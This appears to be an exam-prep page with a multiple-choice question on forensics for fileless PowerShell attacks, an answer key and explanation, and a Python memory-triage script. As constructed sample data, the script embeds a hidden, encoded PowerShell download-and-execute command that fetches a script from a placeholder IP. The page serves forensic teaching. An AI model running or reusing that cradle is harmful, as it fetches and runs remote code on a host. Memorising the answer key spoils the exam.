
300-215 Question #118: Real Exam Question with Answer & Explanation

The correct answer is C: Volatile memory capture.

Submitted by akirajp · Mar 6, 2026 · Forensics Techniques

Question

An endpoint shows suspicious PowerShell activity, but no malicious files are found on disk. What evidence source is MOST likely to reveal the attacker's actions?

Options

  • A. NTFS Master File Table (MFT)
  • B. Windows Registry Run keys
  • C. Volatile memory capture
  • D. Windows Prefetch files

Explanation

Fileless attacks (PowerShell one-liners, reflectively loaded DLLs, in-memory implants) often never write a payload to disk, so disk-centric artifacts tell only part of the story. The MFT (A) records file metadata and would show at most the timestamps of powershell.exe itself; Run keys (B) reveal persistence, not what was executed; Prefetch (D) shows that powershell.exe ran and roughly when, but not its arguments. A volatile memory capture, by contrast, can contain the process's full command line (including any -EncodedCommand argument, which can be decoded), script text and other strings still resident in the process, injected code, command history, and the process's active network connections. Two practical caveats: memory is lost on reboot or power-off, so capture it (for example with WinPmem or DumpIt, then analyze with Volatility) before remediating the host; and if PowerShell script block logging was enabled, Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log would also record the decoded script, which is worth checking alongside the capture.
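As an added illustration of the point above (this is example code written for this page, not part of the original question or any tool it mentions), the script below performs a strings-style triage of a raw memory image: it extracts ASCII and UTF-16LE strings the way `strings` and `strings -el` would, looks for a PowerShell `-EncodedCommand` argument that was still resident in process memory, decodes it, and pulls any URLs out of the recovered command. The memory image, the command line and the URL in it are all constructed inline for the example; a real capture would be a multi-gigabyte file from WinPmem or DumpIt that you would open with `mmap` and feed to the same functions.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample command, used only to build the fake memory image below.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"


def build_sample_image() -> bytes:
    """Build a tiny stand-in for a raw memory capture (constructed test data).

    Windows keeps process command lines as UTF-16LE in the PEB, so the
    PowerShell launch line is embedded in that encoding; a second, unrelated
    ASCII command line is included to show that both string types are scanned.
    """
    encoded = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
    ps_cmdline = f"powershell.exe -nop -w hidden -EncodedCommand {encoded}"
    return (
        b"\x00" * 64
        + ps_cmdline.encode("utf-16-le")
        + b"\x00" * 32
        + b"C:\\Windows\\System32\\cmd.exe /c whoami"
        + b"\x00" * 16
    )


# Printable runs of at least 8 characters, in ASCII and in UTF-16LE.
ASCII_RE = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# PowerShell accepts abbreviated switch names, so match the common prefixes.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\")]+")


def extract_strings(image: bytes) -> List[str]:
    """Return printable strings found in the image, ASCII first, then UTF-16LE."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(image)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RE.finditer(image)]
    return found


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand value: base64 wrapping UTF-16LE script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text: str) -> List[str]:
    """Pull http(s) URLs out of recovered script text for IOC follow-up."""
    return URL_RE.findall(text)


def find_encoded_commands(image: bytes) -> List[Dict[str, object]]:
    """Locate resident PowerShell encoded commands and return them decoded."""
    findings: List[Dict[str, object]] = []
    for s in extract_strings(image):
        for m in ENC_RE.finditer(s):
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                continue  # not valid base64/UTF-16LE; skip the false positive
            findings.append({"cmdline": s, "decoded": decoded, "urls": extract_urls(decoded)})
    return findings


if __name__ == "__main__":
    for f in find_encoded_commands(build_sample_image()):
        print("command line :", f["cmdline"])
        print("decoded      :", f["decoded"])
        print("urls         :", f["urls"])
```

On a real image the same regexes run unchanged over an `mmap`ed file, and the decoded text is what you would then pivot on: the URL or IP becomes a network IOC, and the script body tells you what the attacker actually did, which none of the disk artifacts in the other options can show.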

Topics

#memory forensics · #PowerShell forensics · #volatile memory · #fileless malware
